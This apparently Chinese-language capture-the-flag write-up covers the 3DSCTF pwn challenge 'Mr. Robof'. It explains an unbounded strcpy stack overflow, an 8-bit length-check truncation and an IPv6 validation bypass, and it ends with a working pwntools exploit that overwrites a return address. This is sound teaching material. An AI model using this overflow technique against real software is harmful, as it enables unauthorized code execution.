3DSCTF PWN —— Mr. Robof

竟然没任何保护

# checksec ./020d04ea8f10ac07c5b83f3d0910108b 
[*] '/root/learn/3DSCTF/Robof/020d04ea8f10ac07c5b83f3d0910108b'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)

基本上这种情形就是执行shellcode

漏洞在storeCheckedIP,只要绕过ip检查即可进入这里

/*
 * Decompiled (IDA) view of the sink: the caller's string is copied into a
 * stack buffer with strcpy(), i.e. with no length check at all.
 * - `dest` is shown as a single char at [bp-30h]; the decompiler has collapsed
 *   the local array, so the buffer presumably starts 0x30 bytes below the
 *   saved ebp (the payload later on the page is sized for exactly that offset).
 * - Any input longer than that overwrites the saved frame pointer and the
 *   return address; checksec above shows no stack canary and NX disabled, so
 *   nothing stops the overwrite from being exploited.
 * Mitigation: give the buffer an explicit size and bound the copy
 * (e.g. snprintf(dest, sizeof dest, "%s", src)), or reject oversized input
 * with a length check that is not truncated (see validateSize below).
 */
int __cdecl storeCheckedIP(char *src)
{
char dest; // [sp+8h] [bp-30h]@1

strcpy(&dest, src); // unbounded copy of caller-controlled data: this is the overflow
puts("// TODO - Finish later...");
return 1;
}

这两个检查是validateSize和validateIP

v6 = validateSize(&s);
v5 = validateIP(&s);

size 需要大于 1 且小于等于 0x28,这个 strlen 只要用 00 截断即可,但上面的 strcpy 也会被 00 截断,这条路肯定不行;再一看这个 v2 是 8 位 unsigned 整型,可以整数溢出——strlen 的结果被截断到 8 位,例如 270 字节的输入会被当成 270 % 256 = 14,正好通过检查

/*
 * Length check on the input string; intended to accept only lengths in
 * (1, 0x28]. Defect: the strlen() result is stored in an 8-bit unsigned local
 * (`v2`), so the length is reduced modulo 256 before it is compared. A 270-byte
 * string therefore measures as 14 and passes, which is what the payload on
 * this page relies on. Storing the length in a size_t and comparing that
 * directly closes the hole.
 */
_BOOL4 __cdecl validateSize(char *s)
{
unsigned __int8 v2; // [sp+2Fh] [bp-9h]@1

_x86_get_pc_thunk_ax(); // compiler-emitted get-PC thunk; its result is unused here
v2 = strlen(s); // truncated to 8 bits on this assignment
return v2 > 1u && v2 <= 0x28u;
}

检测 ip 的(其中 inet_pton 是将文本形式的地址,如"点分十进制",转换为二进制整数)
但是这里遇到.就直接返回了,这个就棘手了
后来发现 10 是 AF_INET6,也就是 ipv6 的地址族,汗~

/*
 * Copies the input up to the first '.' into a local buffer and asks
 * inet_pton() whether that prefix parses as an address. Points to note:
 * - The address-family argument is the literal 10, which on Linux is
 *   AF_INET6, so the prefix is validated as IPv6 text (e.g. the
 *   "0:0:0:0:0:0:0:0" shown below), not as dotted-decimal IPv4.
 * - A '.' terminates the copy and returns immediately, so nothing after the
 *   first '.' in `input` is ever inspected by this check.
 * - If neither '.' nor a NUL byte occurs in the first 41 bytes, `cp` is
 *   filled completely and never NUL-terminated before inet_pton() reads it;
 *   the loop also reads 41 bytes of `input` regardless of its real length.
 * - `v4` is typed as a 4-byte int by the decompiler, but an AF_INET6 result
 *   is 16 bytes; the real local is presumably larger — TODO confirm.
 * - `v1` is computed and never used (artefact of the get-PC thunk).
 * A real validator should parse the whole string with an explicit length,
 * always terminate the copy, and pass a correctly sized destination.
 */
int __cdecl validateIP(int input)
{
char *v1; // eax@1
char cp[41]; // [sp+7h] [bp-51h]@3
int v4; // [sp+38h] [bp-20h]@6
int i; // [sp+4Ch] [bp-Ch]@1

v1 = (char *)_x86_get_pc_thunk_ax() + 6430; // unused
for ( i = 0; i <= 40; ++i )
{
if ( *(_BYTE *)(i + input) == '.' )
{
cp[i] = 0; // '.' acts as the terminator: the rest of the input is ignored
return inet_pton(10, cp, &v4); // 10 == AF_INET6
}
cp[i] = *(_BYTE *)(i + input);
}
return inet_pton(10, cp, &v4); // cp has no terminator if the loop ran to the end
}

ip示例

# ./020d04ea8f10ac07c5b83f3d0910108b 
0:0:0:0:0:0:0:0
-> Valid IP
// TODO - Finish later...

而且ip那里特意给了个.截断,最终exp

# -*- coding: utf-8 -*-
# Final payload for the write-up above. Written for Python 2 pwntools: str and
# the bytes returned by p32() are concatenated directly, which would not work
# unchanged under Python 3.
from pwn import *

p = process("./020d04ea8f10ac07c5b83f3d0910108b")
# Address placed over the saved return address; the name suggests the
# program's input-reading routine, but that function is not shown on this page.
readips = 0x08048819
padding = "a" * 36
trueipv6 = "0:0:0:0:0:0:0:0"  # accepted by validateIP (family 10 == AF_INET6)
# The '.' stops validateIP's copy, so nothing after it is seen by the IP check.
payload = trueipv6 + "\x2e" + padding
# 15 + 1 + 36 = 52 = 0x30 + 4: storeCheckedIP's buffer is at [bp-30h], so the
# next 4 bytes land on its saved return address.
payload += p32(readips)
# Total length 270 reads as 270 % 256 = 14 through validateSize's 8-bit
# length variable, so the size check passes.
payload += "a" * (270 - len(payload))

p.sendline(payload)

p.interactive()